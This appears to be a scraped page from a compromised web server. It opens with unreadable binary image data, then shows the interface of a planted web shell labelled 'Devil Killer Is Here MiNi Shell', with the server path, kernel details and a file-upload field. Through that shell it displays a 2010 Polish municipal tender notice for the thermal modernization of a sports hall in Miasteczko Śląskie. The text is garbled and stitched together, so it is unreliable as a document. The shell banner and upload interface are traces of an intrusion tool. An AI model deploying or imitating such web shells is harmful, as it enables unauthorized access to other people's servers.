JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100305/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100305/49869-N-2010.html

<p class="kh_header"><b>Miasteczko Śląskie: OPRACOWANIE DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ ORAZ WYKONANIE ROBÓT BUDOWLANYCH I INSTALACYJNYCH ZWIĄZANYCH Z TERMOMODERNIZACJĄ HALI SPORTOWEJ MOSiR-u W MIASTECZKU ŚLĄSKIM</b><br>
<b>Numer ogłoszenia: 49869 - 2010; data zamieszczenia: 05.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Miasteczku Śląskim , ul. Rynek 8, 42-610 Miasteczko Śląskie, woj. śląskie, tel. 032 393 80 01, faks 032 393 80 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasteczko-slaskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ ORAZ WYKONANIE ROBÓT BUDOWLANYCH I INSTALACYJNYCH ZWIĄZANYCH Z TERMOMODERNIZACJĄ HALI SPORTOWEJ MOSiR-u W MIASTECZKU ŚLĄSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej oraz wykonanie robót budowlanych i instalacyjnych związanych z termomodernizacją hali sportowej MOSiR-u w Miasteczku Śląskim.
2. Przedmiot zamówienia obejmuje:
1/ wykonanie inwentaryzacji obiektu,
2/ wykonanie dokumentacji projektowo-kosztorysowej dla inwestycji Termomodernizacja hali sportowej MOSiR-u w Miasteczku Śląskim w zakresie:
- uzyskania i aktualizacji map do celów projektowych,
- projekt budowlany (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego - Dz.U. z 2003 r. Nr 120, poz. 1133 z późn. zm.),
- specyfikacja techniczna wykonania i odbioru robót,
- dokumentacja kosztorysowa,
3/ zgłoszenie wykonania termomodernizacji w odpowiednim organie,
4/ wykonanie zadania inwestycyjnego zgodnie z opracowaną dokumentacją,
5/ opracowanie dokumentacji powykonawczej (łącznie z protokołami, świadectwami dopuszczenia, atestami, informacją o udzielonej gwarancji).

Dokumentacja projektowo-kosztorysowa - 
Wykonawca zobowiązany jest do opracowania dokumentacji techniczno-kosztorysowej niezbędnej do wykonania termomodernizacji hali sportowej MOSiR w Miasteczku Śląskim. Wykonana dokumentacja projektowo-kosztorysowa zostanie wykonana na podstawie:
- Programu funkcjonalno-użytkowego wykonanego przez Agencję Rozwoju Lokalnego AGROTUR S.A.,
- Audytu energetycznego budynku Hali Sportowej MOSiR-u Miasteczko Śląskie przy ul. Sportowej 1 wykonanego przez AGROTUR S.A.,
- uzgodnienia z Zamawiającym,
- wizji w terenie,
- wykonanej inwentaryzacji architektonicznej oraz branżowej Hali Sportowej MOSiR,
- niezbędnych uzgodnień, opinii ekspertów.

Dokumentacja projektowa przed złożeniem do Starostwa Powiatowego w Tarnowskich Górach Wydział Budownictwa i Architektury Zgłoszenia o zamiarze wykonania robót budowlanych nie wymagających uzyskania decyzji o pozwoleniu na budowę musi być uzgodniona z Zamawiającym. Czas dla Zamawiającego na uzgodnienie przedmiotowej dokumentacji ustala się na 5 dni roboczych.
Ponadto Wykonawca zapewni wykonanie:
- harmonogramu finansowo-rzeczowego realizacji inwestycji - w uzgodnieniu z Zamawiającym,
- planu organizacji budowy i technologii robót,
- informacji projektanta o wymaganiach bezpieczeństwa i ochrony zdrowia.

Wymagania dotyczące termomodernizacji obiektu - 
Docieplenie ścian (742 m2) - współczynnik U < 0,3 W/m2K,
- uzupełnienie tynków zewnętrznych zwykłych,
- przygotowanie podłoża poprzez czyszczenie mechaniczne i mycie,
- ocieplenie ścian płytami styropianowymi grubości 12 cm metodą lekką mokrą (materiał styropian samogasnący EPS-70-040 sezonowany minimum 2 mies. o parametrach określonych w PN-EN 13163:2004, siatka z włókna szklanego o masie nie mniejszej niż 145 g/m2, o oczkach 3-5/4-7 mm o parametrach określonych w PN-92/P-85010, kołki rozporowe - wkręty ocynkowane z koszulką z tworzywa sztucznego, łączniki ocynkowane, gwoździe ocynkowane),
- ocieplenie ościeży okien i drzwi styropianem grubości 2 cm, (materiał styropian samogasnący EPS-70-040 sezonowany minimum 2 mies. o parametrach określonych w PN-EN 13163:2004), siatka z włókna szklanego o masie nie mniejszej niż 145 g/m2, o oczkach 3-5/4-7 mm o parametrach określonych w PN-92/P-85010,
- montaż listwy cokołowej oraz narożników kątownikami ochronnymi, perforowanymi 25 x 25 x 0,5 mm wraz z przygotowaniem podłoża z gotowej suchej mieszanki,
- wyprawa elewacyjna cienkowarstwowa: farba gruntująca jako pierwsza warstwa, wyprawa żywiczno-mineralna o grubości 2,5 mm jako druga warstwa (paleta barw do uzgodnienia z Zamawiającym),
- rozebranie obróbek blacharskich murów ogniowych oraz parapetów zewnętrznych,
- rozebranie rynien i rur spustowych,
- montaż nowych rynien, parapetów zewnętrznych oraz obróbek blacharskich (blacha stalowa ocynkowana o gr. 0,7 mm),
- wykucie z muru krat okiennych i wstawienie nowych krat, uwzględniając warstwę ocieplenia,
- wymiana okien zespolonych na uchylno-rozwieralne (współczynnik U < 1,6 W/m2K), (6 szt.)
- wymiana okien z luxfer na PCV (2 szt.) oraz częściowe zamurowanie otworów po luxferach,
- wymiana drzwi wejściowych stalowych na ocieplane ognioodporne (1 szt.),
- wymiana drzwi balkonowych (1 szt.).

Docieplenie stropodachu (512 m2) - współczynnik U < 0,25 W/m2K - 
- wykonanie izolacji cieplnej stropodachu styropapą,
- położenie papy termozgrzewalnej,
- demontaż obróbek blacharskich,
- montaż obróbek blacharskich (blacha stalowa ocynkowana o gr. 0,7 mm),
- rozebranie instalacji odgromowej,
- montaż nowej instalacji odgromowej,
- wykonanie badań instalacji piorunochronnej,
- demontaż i montaż drabinek stalowych,
- wymiana instalacji grzewczej c.o.,
- demontaż rurociągów stalowych (374 mb),
- demontaż grzejników z rur stalowych ożebrowanych (typu Faviera) i stalowych płytowych (51 szt.),
- demontaż zbiornika odpowietrzającego,
- montaż instalacji c.o. niskoparametrowej (90/70 oC) z tworzywa sztucznego,
- montaż grzejników konwektorowych stalowych wyposażonych w głowice termostatyczne i zaworki odpowietrzające,
- montaż armatury regulacyjnej (zawory przygrzejnikowe oraz regulacyjne podpionowe),
- próby szczelności,
- kucie otworów w przegrodach z osadzeniem rur stalowych osłonowych,
- zamurowanie otworów,
- zabudowa osłon grzejników na sali gimnastycznej,
- zabudowa kurtyny powietrznej,
- zabudowa regulatora pogodowego.

Instalacja wentylacyjna grawitacyjna z odzyskiem ciepła -
- zabudowa centrali wentylacyjnej z rekuperatorem (kubatura hali 3000 m3, ilość osób przebywających jednocześnie: 80, ilość wymian zgodnie z normą dla tego typu obiektów),
- zabudowa sterowania automatycznego pracą systemu wentylacyjnego,
- zabudowa nagrzewnic wodnych (wstępnych i wtórnych),
- montaż instalacji wentylacyjnej (nawiewniki, wywiewniki, przepustnice regulacyjne, czerpnie i wyrzutnie kanałowe, kanałowe tłumiki dźwięku),
- materiały i elementy montażowe,
- montaż instalacji elektrycznej,
- zabudowa izolacji kanałów i kształtek wentylacyjnych,
- obróbki budowlane i uszczelnienia.

Instalacja przygotowania c.w.u. poprzez kolektory słoneczne - 
- zabudowa kolektorów słonecznych,
- zabudowa zbiornika ciepłej wody 1-wężownicowy o pojemności nie mniejszej niż 1000 dm3, z wysokosprawną izolacją termiczną płaszcza wodnego,
- zabudowa zasobników solarnych o pojemności nie mniejszej niż 2000 dm3,
- zabudowa pomp obiegowych klasy nie mniejszej niż A,
- zabudowa rurociągów solarnych miedzianych,
- zabudowa izolacji termicznej (dla rur obiegu solarnego, typu HT kauczukowa o podwyższonej odporności na temp. min. 175oC, dla pozostałych obiegów izolacje o parametrach jak dla instalacji grzewczych tradycyjnych,
- napełnienie instalacji czynnikiem grzewczym mrozoodpornym do temp. - 28oC),
- wykonanie próby szczelności,
- wykonanie próby z dokonaniem regulacji instalacji c.o.

Zamawiający wymaga, aby elementy konstrukcyjne budynku miały zapewnioną trwałość nie mniejszą niż 20 lat a orurowanie w instalacjach nie mniejszą niż 10 lat.

3. Szczegółowy opis przedmiotu zamówienia zawarty jest w audycie energetycznym i programie funkcjonalno-użytkowym, które stanowią integralną część niniejszej specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.26.14.10-1, 45.42.11.32-8, 45.33.11.00-7, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem zawodowym polegającym na tym, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty odpowiadające rodzajem i wartością przedmiotowi zamówienia. Przez roboty budowlane odpowiadające rodzajem i wartością Zamawiający rozumie roboty polegające na wykonaniu termomodernizacji obiektu publicznego na kwotę nie mniejszą niż 500.000,00 zł (brutto) każda. Wykaz wykonanych robót budowlanych  (wzór - załącznik nr 2 do formularza oferty).
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje osobą lub osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi:
a) aktualne uprawnienia budowlane do projektowania:
- w specjalności architektonicznej,
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych bez ograniczeń;
b) aktualne uprawnienia budowlane do kierowania robotami budowlanymi:
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych bez ograniczeń.
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (wzór - załącznik nr 3 do formularza oferty).
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę ubezpieczenia nie mniejszą niż 500.000,00 zł. Opłacona polisa.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór - załącznik nr 1 do formularza oferty).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy w zakresie ceny ofertowej:
- w przypadku ustawowej zmiany stawki podatku VAT w trakcie realizacji przedmiotu zamówienia o wielkość tej stawki,
- w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym.
2. Zamawiający przewiduje możliwość dokonania zmian w zawartej umowie w zakresie terminu realizacji zamówienia:
- w przypadku udzielenia Wykonawcy zamówienia dodatkowego w oparciu o art. 67 ust. 1 pkt. 5 ustawy Pzp, jeśli jego wykonanie (sposób, technologia) będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego;
- w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia;
- jeżeli warunki atmosferyczne uniemożliwiają prowadzenie robót budowlanych zgodnie z wymaganiami opisanymi w specyfikacji technicznej lub sztuką budowlaną. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru. Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe (właściwe) dla danej pory roku i miesiąca lub zła organizacja robót nie uzasadnia zmiany umowy;
- w przypadku wystąpienia wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji;
- w przypadku zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;
- gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze SIWZ.
W powyższych przypadkach nowy termin wykonania zamówienia podstawowego ustali Zamawiający po negocjacjach z Wykonawcą.
3. Zamawiający przewiduje zmiany parametrów technicznych przyjętych rozwiązań.
Zamawiający przewiduje możliwość dokonania zmiany parametrów technicznych przyjętych w dokumentacji rozwiązań, wynikłych w trakcie prowadzenia robót, jeżeli zmiany te przyczynią się do ułatwień w sposobie prowadzenia inwestycji, a nie wpłyną na ogólne własności cieplne obiektu.
W powyższym przypadku Wykonawca jest zobowiązany do przeprowadzenia uzgodnień z projektantem odnośnie proponowanych zmian.
Zmiany parametrów technicznych nie mogą wpłynąć na wysokość ceny przyjętej w ofercie.
4. Zamawiający przewiduje zmiany osób wyznaczonych przez Zamawiającego i Wykonawcę do nadzorowania i kontaktów roboczych w trakcie realizacji.
Osoby wyznaczone i wpisane do umowy jako osoby nadzorujące lub współpracujące w zakresie realizacji przedmiotu zamówienia mogą być zmienione zarówno przez Zamawiającego i Wykonawcę. Jeśli osoby te winny spełniać określone wymagania, to strony potwierdzą to w sposób przewidziany w niniejszej SIWZ. Jeżeli osoby te nie muszą spełniać określonych wymagań, to ich zmiana może nastąpić po uprzednim pisemnym zawiadomieniu strony przeciwnej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.miasteczko-slaskie.pl<br>
